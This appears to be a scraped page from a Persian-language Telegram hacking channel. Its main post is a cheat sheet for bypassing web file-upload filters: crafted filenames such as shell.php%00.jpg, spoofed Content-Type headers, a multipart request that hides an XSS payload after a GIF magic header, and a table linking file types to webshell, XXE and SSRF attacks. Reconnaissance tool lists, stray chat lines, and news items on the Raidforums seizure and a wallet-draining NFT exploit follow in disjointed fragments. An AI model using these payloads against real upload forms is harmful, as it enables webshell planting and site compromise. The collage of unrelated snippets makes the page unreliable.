CyberSecurity – Telegram
CyberSecurity
902 subscribers
122 photos
26 videos
73 files
146 links
Welcome to dark hell

‌ ما از دانش خود برای مهندسی دنیایی امن ‌تر استفاده می‌کنیم 🔐
Download Telegram
نکاتی برای دور زدن محدودیدت آپلود فایل:

🔹 تغییر پسوند فایل ها

۱- افزودن کارکترهای خاص به انتهای پسوند فایل
مثال:
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php….
file.pHp5….

۲- استفاده از پسوند های دوگانه
مثال:
file.png.php
file.png.pHp5

۳- استفاده از نال بایت و داده جانک
مثال:
shell.php%00.jpg
shell.php%0delete0.jpg
file.phpJunk123png

۴- استفاده از حروف کوچک و بزرگ
مثال:
file.jPg
file.SvG
file.asP

۵- استفاده از HTTP Parameter Pollution در نام فایل
مثال:
filename=1.jpg&filename=.php

🔹 دور زدن اعتبارسنجی مقدار content-type با تغییر MIME type
مثال:
تبدیل
Content-type: application/x-php
به
Content-type: image/jpeg


🔹 دور زدن اعتبار سنجی هدر فایل
۱- فیلتر های بررسی کننده هدرfile signatures معمولا صحت ۴ بایت اول آن را مورد بررسی قرار می دهند که می توان بعد از آن کد مخرب را قرار داد
مثال:
-----------------------------6683303835495
Content-Disposition: form-data; name="upload"; filename="badfile.''gif"
Content-Type: image/png

GIF8
<html><noscript>alert('XSS is easy');</noscript></html>
-----------------------------6683303835495--

لیست هدرfile signatures:
https://en.wikipedia.org/wiki/List_of_file_signatures

۲- استفاده از CRLF در محتوای فایل
مثال:
x.png%22%0d%0a%0d%0a%0d%0a<noscript>alert(1)</noscript>

🔹در پایان لیستی آورده شده است که با کمک آن می توان فهمید پسوند های مختلف فایل به چه حملاتی می تواند منجر شود:
SVG: Stored XSS / SSRF / XXE
HTML / JS : HTML injection / XSS / Open redirect
ASP / ASPX / PHP5 / PHP / PHP3: Webshell / RCE
GIF: Stored XSS / SSRF
CSV: CSV injection
PNG / JPEG: Pixel flood attack (DoS)
ZIP: RCE via LFI / DoS
PDF / PPTX: SSRF / BLIND XXE
XML: XXE
AVI: LFI / SSRF

اطلاعات بیشتر در:
https://infosecwriteups.com/all-about-unrestricted-file-upload-a4ecf243b86b
https://anotherhackerblog.com/exploiting-file-uploads-pt1/
https://book.hacktricks.xyz/pentesting-web/file-upload
لیستی از بهترین موتورهای جستجو امنیتی برای آزمونگران امنیت
nmap -sV -A -> nikto -h -> amass -> subli3ter ->girtrob
آلت کیو بگیرم الان دختره احمق😂😂😂😂😂😂
dnsgen
burp turbo intruder
bugbountyhunting.com
temprory mail
by binwallk
CyberSecurity
https://wordlists.assetnote.io/
fuzz wordlist
CyberSecurity
GIF
✔️ انجمن هکینگ Raidforums توسط پلیس مصادره شد.

مدیران انجمن هک Raidforum میگویند دامنه رسمی این سایت (Raidforums.com) توسط پلیس مصادره شده و مدیر اصلی سایت ( با نام کاربری Omnipotent ) مدت زیادی است که مفقود شده و احتمالا دستگیر شده است!

این سایت از انجمن‌ساز MyBB استفاده میکند و چند هفته پیش به علت ضعف امنیتی و عدم به‌روز‌رسانی دیتابیس این انجمن هک شد و هکرها بعد از دانلود اطلاعات جداول دیتابیس را Drop کردند که هکرهای دیگر نتوانند به دیتابیس انجمن دسترسی پیدا کنند.

- نکته قابل توجه این است که اکثر دیتاهایی که بصورت عمومی از سرویس های ایرانیان فروخته میشد در این فروم قرار میگرفت!

انجمن Raidforums یکی از بزرگترین سایتهای هک تحت وب بود که بیشتر برای درز اطلاعات و خرید و فروش دیتابیس‌ مورد توجه قرار داشت.
⭕️ از دست رفتن تمام دارایی، تنها با کلیک بر یک NFT مخرب
@matitanium
💰پلتفرم Rarible با بیش از ۲.۱ میلیون کاربر و حجم معاملات بیش از ۲۷۳ میلیون دلار در سال، یکی از بزرگترین بازارهای NFT جهان به‌شمار می‌رود.

💸 به‌تازگی یک نقص امنیتی در این پلفترم شناسایی شده، که بواسطه‌ی آن تمام دارایی کاربر تنها با کلیک کردن بر یک NFT مخرب، سرقت خواهد شد.

👾 روش هک

۱. هکر ابتدا یک NFT مانند عکس یا گیف طراحی می‌کند، و کد مخربی را در آن قرار می‌دهد.

۲. در صورت کلیک کاربر بر آن، کد جاوااسکریپت مخرب اجرا، NFTهای کاربر با استفاده از API اتریوم بررسی، و درخواست تراکنش setApprovalForAll به والت کاربر ارسال می‌شود.

🔗 تابع setApprovalForAll و حساسیت آن

۳. حال در صورت موافقت کاربر و تایید تراکنش، مهاجم به NFTهای قربانی دسترسی کامل پیدا کرده و می‌تواند آنها را به حساب خود منتقل کند.


🌐 یک نمونه NFT مخرب و مراحل هک توسط آن + توصیه‌های امنیتی
@matitanium
به نام خدا
باه باه
اینم هانت امروز رویه برنامه بانتی